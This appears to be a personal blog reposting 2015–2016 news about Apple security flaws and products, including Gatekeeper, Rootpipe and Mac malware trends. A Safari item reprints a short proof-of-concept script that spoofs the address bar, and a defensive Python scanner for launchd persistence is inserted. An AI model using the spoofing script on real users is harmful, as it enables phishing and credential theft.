Wednesday, January 20, 2016

Apple Gatekeeper still lets malware in

from komando.com
If you use a Mac, you may be comforted by its reputation for being secure. For decades, Apple had done a great job of keeping hackers out.

That is, until Apple products started becoming really popular in recent years. Then, hackers began to pounce. Now, Macs are often hit by hackers, or found to be vulnerable to attack.

That's the case with Apple Gatekeeper. Ironically, it's a program that's meant to keep the bad guys out. If you download apps, you can tell Apple to only let in apps from trusted providers.

As Apple puts it, Gatekeeper helps "protect your Mac from malware and misbehaving apps downloaded from the Internet." Apple says it screens all the apps on the Mac App Store, and those created by developers with an Apple Developer ID.

Apple goes on to say: "If an app was developed by an unknown developer, one with no Developer ID, or tampered with, Gatekeeper can block the app from being installed."

The problem is cybersecurity experts last year found there's a flaw with Gatekeeper. The flaw, CVE-2015-7024, lets hackers get in. Once in, they can use malware to steal your personal information, take over your Mac and demand ransom, spy on you, and more.

Last year, this same cybersecurity expert alerted Apple about the flaw in Gatekeeper. Apple issued a patch to fix the problem.

However, as it turned out, Apple patched only some of the entryways for hackers to get in. The problem is, hackers can still get into Gatekeeper.

They can access a trusted app and load malware in a .dmg file onto your Mac. It's vulnerable if you're not using the secure HTTPS protocol, or you're not accessing the app from the Mac App Store.

As of now, Apple is said to be working with cybersecurity experts to fully patch up the security flaw in Gatekeeper.

While Apple and cybersecurity experts work on fixing this vulnerability, you should make sure you're protecting yourself, your financial information, and your digital devices. You should use a suite of strong security tools, including an anti-virus program. We recommend our sponsor, Kaspersky Lab.

Thursday, December 31, 2015

Long Island Man Spends 10 Days in Hospital After iPhone Explodes in His Pocket

from patch.com "Best of 2015"
A Lindenhurst man recently spent more than a week in the hospital after his iPhone spontaneously exploded in his pocket.

Erik Johnson had reportedly just arrived at his cousin’s wake on Valentine’s Day when his iPhone 5c exploded as he bent down to pick up a set of keys he had dropped.

“I felt the burn instantly and a cloud of smoke instantly,” the 29-year-old told News 12 Long Island. “I couldn’t get the phone out of my pocket, so I had to rip my pants off to get the phone away from me.”

Johnson suffered a third-degree burn the size of a football to his upper left thigh and spent 10 days in a hospital burn unit. He returned home on Tuesday.

The story was first reported by ABC 7. Johnson told the TV station that he heard a pop and then saw smoke coming from his pocket when he reached down to pick up the keys.

Johnson says his leg caught fire and the intensity of the heat melted his pocket shut.

“A couple of people actually said they could smell my body burning,” Johnson told ABC 7.

Apple says it is investigating the incident. Johnson is planning legal action against the electronics giant.

“Even if this only happened this one time, that’s one time too many,” Johnson’s lawyer, Mike Della, said according to the Daily News. “What if this happened to a child?”

There have been other recent reports of exploding iPhones. In October, an Arizona man claimed his iPhone 6 burst into flames in his pocket following a minor rickshaw accident. Last February, a middle school student in Maine suffered minor injuries after her iPhone 5c exploded in her pocket.

Monday, December 14, 2015

Cybercriminals will target Apple in 2016, say experts

from bbc.com
Cybercriminals are increasingly targeting Apple devices and 2016 will see a rise in attacks on its operating systems, security experts suggest.
According to security firm Symantec, the amount of malware aimed at Apple's mobile operating system (iOS) has more than doubled this year, while threats to Mac computers also rose.
Security firm FireEye also expects 2016 to be a bumper year for Apple malware.
Systems such as Apple Pay could be targeted, it predicts.
Apple is an obvious target for cybercriminals because its products are so popular, said Dick O'Brien, a researcher at Symantec.
While the total number of threats targeting Apple devices remains low compared with Windows and Android, Symantec is seeing the range of threats multiply.
Last year, it was seeing a monthly average of between 10,000 and 70,000 Mac computers infected with malware.
"This is far fewer than Windows desktops and we don't want to scaremonger. Apple remains a relatively safe platform but Apple users can no longer be complacent about security, as the number of infections and new threats rise," said Mr O'Brien.
The number of unique OS X computers infected with malware in the first nine months of 2015 was seven times higher than in all of 2014, its research found.
A significant amount of this spike is accounted for by so-called greyware - applications that may not have malware attached but can still be annoying to users, by serving up unwanted ads or tracking their web-browsing habits.
Symantec also found seven new threats aimed at Apple's mobile iOS platform, with jailbroken devices - those that have been unlocked - being particularly vulnerable.
And hackers are also increasingly targeting corporations, where Mac use is now more prevalent.
A corporate espionage group known as Butterfly which attacked multi-billion dollar companies in 2015 developed malware tools that attacked both Windows and Apple computers.
Walled garden
Traditionally iOS has been seen as a more secure platform than Android because of the more closed community that Apple runs for its apps but that is changing, according to FireEye.
While it found that the vast majority - 96% - of mobile malware is targeted at Android devices, iOS is no longer immune.
According to Bryce Boland, chief technology officer at FireEye, attackers are increasingly "finding ways into Apple's walled garden, and that will ramp up next year".
FireEye recently discovered that XcodeGhost, iOS malware that Apple acted quickly to remove from its app store, had found its way into the networks of 210 US businesses.
The attack was thought to be the first large-scale attack on Apple's app store.
The introduction of new payment systems, such as Apple Pay, will add a financial incentive for hackers, making it worth their "time and effort" to develop new malware, FireEye said.
Mr O'Brien said: "We haven't yet seen any threats targeting Apple Pay but anything that involves a financial transaction will be of interest to hackers."

Thursday, November 5, 2015

Mac OS X Malware Soars in 2015

from infosecurity-magazine.com
Mac malware is set to accelerate over the coming months after having its most prolific year ever so far in 2015, according to new research from endpoint security firm Bit9 + Carbon Black.
After an analysis of the year so far, the vendor concluded that five times more Mac malware appeared in 2015 than the previous five years combined.   
It collected 1,400 unique samples over the period using custom built sandboxes and tools such as fs_usage, dtrace, and opensnoop.
It found that Mac malware as a whole does not borrow very heavily from Unix or Linux malware, which was unexpected given OS X’s roots in the open source FreeBSD.
Another interesting find was that more than 90% of the Mac malware it discovered still uses the old load command (LC_THREAD and LC_UNIXTHREAD) to define the entry point into the Mach-O format.
This makes it easier to spot potential malware—if a new system is still using the old command.
In addition, the Bit9 + Carbon Black researchers concluded that the vast majority of Mac malware uses one of just seven persistence techniques to remain on an infected system.
These include LaunchAgents; LaunchDaemons; Login items; Browser plugins; StartupItems; Binary infection; and Cron job.
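For the first two techniques in that list, an added triage example (not from the article or the vendor's research): it reads every launchd plist in the standard LaunchAgents and LaunchDaemons directories and records what each job runs. The `suspect` rule (hidden path components, temp or shared directories) is an assumed heuristic, and the two sample plists in `demo()` are constructed.

```python
import os
import plistlib
import tempfile
from pathlib import Path

# launchd job directories on OS X (system-wide, Apple-supplied, per-user)
LAUNCHD_DIRS = ["/Library/LaunchAgents", "/Library/LaunchDaemons",
                "/System/Library/LaunchAgents", "/System/Library/LaunchDaemons",
                os.path.expanduser("~/Library/LaunchAgents")]
# Assumed triage heuristic (not from the article): temp or shared locations
SUSPECT_PREFIXES = ("/tmp/", "/private/tmp/", "/var/tmp/", "/Users/Shared/")


def launchd_jobs(dirs=LAUNCHD_DIRS):
    """Return one record per launchd plist: what it runs and whether it looks odd."""
    jobs = []
    for plist in sorted(p for d in dirs for p in Path(d).glob("*.plist")):
        try:
            job = plistlib.loads(plist.read_bytes())  # XML or binary plist
            if not isinstance(job, dict):
                raise ValueError("top-level object is not a dictionary")
        except Exception as exc:  # unreadable or malformed plists are findings too
            jobs.append({"plist": str(plist), "error": str(exc), "suspect": True})
            continue
        args = job.get("ProgramArguments") or []
        program = str(job.get("Program") or (args[0] if args else ""))
        hidden = any(part.startswith(".") for part in Path(program).parts)
        jobs.append({
            "plist": str(plist), "label": job.get("Label", ""),
            "program": program, "run_at_load": bool(job.get("RunAtLoad")),
            "suspect": hidden or program.startswith(SUSPECT_PREFIXES),
        })
    return jobs


def demo():
    """Scan a temp directory holding two constructed plists (sample data)."""
    samples = {
        "com.example.updater": {"ProgramArguments": ["/usr/local/bin/updater", "-d"]},
        "com.example.helper": {"Program": "/Users/Shared/.helper/agent"},
    }
    with tempfile.TemporaryDirectory() as tmp:
        for label, body in samples.items():
            body.update(Label=label, RunAtLoad=True)
            Path(tmp, label + ".plist").write_bytes(plistlib.dumps(body))
        return launchd_jobs([tmp])
```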
It appears the growing prevalence of Mac malware is unsurprisingly linked to a rising market share among consumers and enterprises.
“For years, Mac users have watched their PC-using counterparts struggle with cyber-attacks, while enjoying the relative immunity that their hardware provides from malware. This view is becoming increasingly outdated; our research shows that Mac users should be just as worried,” argued Bit9 + Carbon Black Emea MD, David Flower.
“With 45 per cent of businesses now offering Macs as an option to staff, our research should be seen as a timely reminder that every device on the network is a potential target—businesses can’t just rely on a clearly outdated perception of invulnerability.”

Thursday, September 10, 2015

Apple's Core Problem Is That It Can No Longer Innovate

from forbes.com
Oh, how we laughed when Microsoft unveiled a tablet device with an expensive snap-on keyboard. And, when Steve Jobs declared that the stylus was complete folly and a thing of the past in 2007, we cheered. The tech industry has a very short memory it seems.

Roll forward to 2015 and Tim Cook showed an expectant audience much of the same that we’ve seen before, and like previous years we have grown to accept that the polish and style of delivery masks a growing problem at Cupertino: Apple has run out of juice.



iPhone 6S and 6S Plus

There was nothing here we didn’t already know or even expect, given the many leaks beforehand. Another mid-life iPhone facelift ahead of next year’s iPhone 7, with camera and processor spec bumps. The new iPhone was the last to be announced at the Apple Event because there was nothing to announce. The only attraction this time was Force Touch, something which will definitely kill off the Home Button on the next iteration when Apple figures out how to do fingerprint recognition from the screen for Apple Pay and Touch ID. Tim Cook struggled to make the ubiquitous device seem anything but more of the same. Live Photos? Sounds like a cross between Vine and what Google Photos has been doing for a while now. The 6S Plus is more of a curious beast though, because it almost heralds the death of the iPad Mini, but Apple won’t admit this yet.

iPad Mini 4

Here’s a device which received some treatment before it disappears from the iPad family-photo album entirely. Apple knows exactly how to capitalize on the runt of the litter, and a little extra gloss will definitely sell a few more numbers but with a 6S Plus in the Apple Store there is no real reason to own a Mini anymore. And it gets worse now Big Brother has arrived.

iPad Pro

This is where things get interesting. Apple unveiled a device clearly aimed at the more business and prosumer market. With a price point at the higher end to make laptop buyers weep, coupled with an expensive $169 snap-on keyboard and a ludicrous $99 Apple Pencil (i.e. a stylus) it was the clearest indication that Cupertino couldn’t innovate but only imitate competitor strategy. This was almost an admission that Microsoft got it right with the Surface, but just couldn’t market it like Apple hardware. The Pro is aimed at the enterprise market, a smart move by Apple (which has cut deals with IBM and Cisco for distribution of hardware and apps) in a time of slowing consumer tablet sales. But what could the Pro do to the consumer laptop sales at Apple? Much like the 6S Plus will eat away at the iPad Mini, the iPad Pro will cut into sales of the MacBook Air. The Pro’s speed and screen resolution (it beats a Retina display on a MacBook Pro) will make many think twice about getting an Air, which until now has been Apple’s least expensive way to balance portability and performance.

Apple TV

The bedroom hobby project has been trying to become a serious hobby for years. It has still failed to be anything else, and yesterday’s announcement seemed very odd indeed. Apps are not the future of TV, in fact making consumers sit and watch more TV is not the future of the human race. And certainly owning a separate box to appify television is not the answer. Apple wants us to believe that their black beauty is what we need to make the living room come alive again, but every last-gen and current console has been doing what an Apple TV can do for a few years now, and more. If Apple really wanted to make this a serious concern, it would have baked tvOS into a television unit itself, or licensed it to one major OEM. But it won’t. Given that smart TVs already have apps that cater for the same content as Apple TV, together with consoles, Chromecast, Amazon FireStick, and voice interaction already exists, there is no killer reason to own an Apple TV on top. And as a casual games proposition? Please. Even the wording on the website makes it sound like Apple has singlehandedly reinvented the games industry.

Wednesday, May 20, 2015

Vulnerability in Safari Allows Attackers to Spoof Websites

from tripwire.com
A security firm has discovered a vulnerability in Apple’s Safari Browser that allows attackers to spoof legitimate websites and phish for user credentials.

Security firm Deusen reveals that the flaw works by using a short script to force Safari into loading one page while still displaying the URL of another page. This script is provided below:

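<script>
// Re-assigns location every 10 ms; the address bar keeps showing this URL
// while the page that is already loaded stays on screen.
function f()
{
location="dailymail.co.uk/home/index.htm…"+Math.random();
}
setInterval("f()",10);
</script>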

Deusen has published a demonstration of the vulnerability here.

“The code is very simple: webpage reloads every 10 milliseconds using the setInterval() function, just before the browser can get the real page and so the user sees the ‘real’ web address instead of the fake one,” comments Manuel Humberto Santander Peláez, Handler at SANS Internet Storm Center.
The bug works on fully patched versions of iOS and OSX. Even so, the demo code is not perfect.

Staff members at Ars Technica tested the vulnerability, and while the demo code worked flawlessly with a MacBook Pro, the address bar on an iPad Mini periodically refreshed as the page appeared to reload.

Similarly, Help Net Security experienced some problems when testing the bug. The demo code appeared to work only until a user switched tabs, and even then, it reasoned that savvy users would notice a flickering in the loading progress bar of the address bar.

Despite the demo code’s flaws, less experienced users might not notice this behavior. Attackers could subsequently target unaware users by redirecting them to a malicious website where they could attempt to infect visitors with malware or steal their login credentials.

This vulnerability was discovered by the same group of researchers who discovered a Universal Cross Site Scripting (XSS) vulnerability in the latest versions of Microsoft’s Internet Explorer back in February of this year. That flaw also put web users’ login credentials and sensitive information at risk.

Users are encouraged to watch out for spoofing attacks that redirect them to phishing schemes.

Wednesday, April 22, 2015

Apple 'Rootpipe' security vulnerability still prevalent following patch

from techspot.com
Apple issued an OS X Yosemite update earlier this month which remedied a flaw known as Rootpipe. First discovered last October by security researcher Emil Kvarnhammar (yet having existed since at least 2011), the flaw allows bad actors to gain root access to a system through a backdoor in the system preferences app.
A second security researcher, Patrick Wardle, attempted to exploit the vulnerability on a patched machine and was apparently able to pull it off.
In a post on Objective-See, Wardle said he was on a return flight from a conference when he stumbled upon what he describes as a novel, yet trivial way for any local user to re-abuse Rootpipe. Wardle didn’t provide the technical details of the attack in the spirit of responsible disclosure (except to Apple, of course) but wanted other OS X users to be aware of the risk.
In an e-mailed statement to Forbes, Wardle said he was tempted to walk into an Apple store and try the exploit on a display model but stuck to testing it on his personal laptop.
Wardle, currently the director of research and development at security firm Synack, has made a name for himself in the security community by presenting at conferences including DefCon, VirusBulletin, ShmooCon and CanSecWest.
Apple could have its hands full with Rootpipe. Another security researcher, Pedro Vilaça, told the publication that the original fix was doomed since its release because there are so many ways to bypass it “due to the wrong fix design.”
Apple has also been criticized for only issuing a patch for OS X Yosemite, effectively leaving a large number of Mac users vulnerable.